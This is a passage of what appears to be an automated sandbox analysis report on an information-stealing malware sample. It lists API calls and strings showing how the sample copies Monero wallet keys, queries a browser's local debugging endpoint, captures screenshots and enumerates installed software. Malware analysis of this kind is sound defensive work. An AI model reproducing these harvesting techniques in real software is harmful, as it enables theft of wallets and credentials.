                                                                                                                                                                                                                                                                                • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FF1E
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040FF84
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,0000012E,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 0040FFC4
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 00410037
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410044
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??3@memset$Processstrlen$MemoryOpenQueryReadVirtual_invalid_parameter_noinfo_noreturnmemcpystrcpy
                                                                                                                                                                                                                                                                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73$@Gc$N0ZWFt$steam.exe
                                                                                                                                                                                                                                                                                • API String ID: 2915318159-3068576885
                                                                                                                                                                                                                                                                                • Opcode ID: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                • Instruction ID: 0ac8410772c06d3c7cd158b0f29ba11351ce6fbe5d6182cbcead23e9eae0fd7c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AA125B16043015BDB20AA24DD84BAFBAD5AF41304F10093FF946976C2E7BD99C8839E
                                                                                                                                                                                                                                                                                Function 00404EA0 Relevance: 35.4, APIs: 15, Strings: 5, Instructions: 354networkfilestringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,http://localhost:,00000011), ref: 004050C1
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,http://localhost:,00000011), ref: 00405123
                                                                                                                                                                                                                                                                                • InternetOpenUrlA.WININET ref: 00405152
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 00405183
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004051AD
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 004051D3
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004051E6
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 004051EF
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$??3@CloseFileHandleOpenReadmemcpy$strlen
                                                                                                                                                                                                                                                                                • String ID: "webSocketDebuggerUrl":$"ws://$-$/json$http://localhost:
                                                                                                                                                                                                                                                                                • API String ID: 1783597538-393890490
                                                                                                                                                                                                                                                                                • Opcode ID: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                                • Instruction ID: 1e9bd75843b12caa15a74e03b6a04fcdd02714e47b13e5b8c883d2d1c503f636
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40C1D3706047419BE7249F28C89476FBBE5EF81344F54093EF5829B3D1D778D8448B9A
                                                                                                                                                                                                                                                                                Function 00410D80 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 160registrystringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                • RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410E34
                                                                                                                                                                                                                                                                                • RegEnumKeyExA.KERNEL32 ref: 00410E65
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,?,?,?,?,?,?,00421509), ref: 00410F54
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410FB5
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410FBF
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Close$EnumOpenQueryValue$lstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                • String ID: - $%s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                • API String ID: 2273887489-394048932
                                                                                                                                                                                                                                                                                • Opcode ID: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                • Instruction ID: a9482f3620ee90973302920576edf614ea85895da66572170e0d69f411f645d8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD51A371204314ABD710AF61DC85BAFBBE9EF84744F00881EF48A97251DBB89DC5CB96
                                                                                                                                                                                                                                                                                Function 00411760 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041179A
                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004117A8
                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004117B5
                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004117E2
                                                                                                                                                                                                                                                                                • malloc.MSVCRT ref: 00411847
                                                                                                                                                                                                                                                                                • StrCmpCW.SHLWAPI(?,image/jpeg), ref: 00411878
                                                                                                                                                                                                                                                                                • GetHGlobalFromStream.COMBASE(?,00000000), ref: 004118E2
                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004118EB
                                                                                                                                                                                                                                                                                • GlobalSize.KERNEL32(00000000), ref: 004118FF
                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00411964
                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00417FAE), ref: 0041197F
                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00411986
                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00411993
                                                                                                                                                                                                                                                                                • CloseWindow.USER32(?), ref: 0041199A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSizemalloc
                                                                                                                                                                                                                                                                                • String ID: image/jpeg$screenshot.jpg
                                                                                                                                                                                                                                                                                • API String ID: 290954413-3715547155
                                                                                                                                                                                                                                                                                • Opcode ID: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                • Instruction ID: ee18476c3b49a6e7ea655472561b7fd097213a4b83d20557ae7d52cec962e0ac
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6713D71900619EFDF04AFA0DD89AEEBB79FF08304F005019FA16A7161DB759985CBE4
                                                                                                                                                                                                                                                                                Function 00401480 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 212registrymemoryfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040149A
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 004014B7
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004014C5
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004014DE
                                                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004014F9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401505
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00401511
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,.keys), ref: 00401526
                                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401611
                                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,000000FF), ref: 004016DA
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileHeap$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcatlstrcpylstrlenmemset
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$SOFTWARE\monero-project\monero-core$Wallets$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                • API String ID: 288866737-733413667
                                                                                                                                                                                                                                                                                • Opcode ID: 2285756484b5302f54d26c5f8b61bba89344935ed41bf6c8ffe7ed6eb375a518
                                                                                                                                                                                                                                                                                • Instruction ID: 0f5ab2e365d18679f7850bd259ae8de3c372ef4a79097f50b908b3179d6c5dbc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2285756484b5302f54d26c5f8b61bba89344935ed41bf6c8ffe7ed6eb375a518
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70717331A10218ABCB14EFA1DD969EE7779AF48704F00405EF9016B152DBBCAEC5CBA5
                                                                                                                                                                                                                                                                                Function 004107C0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 69registrymemoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
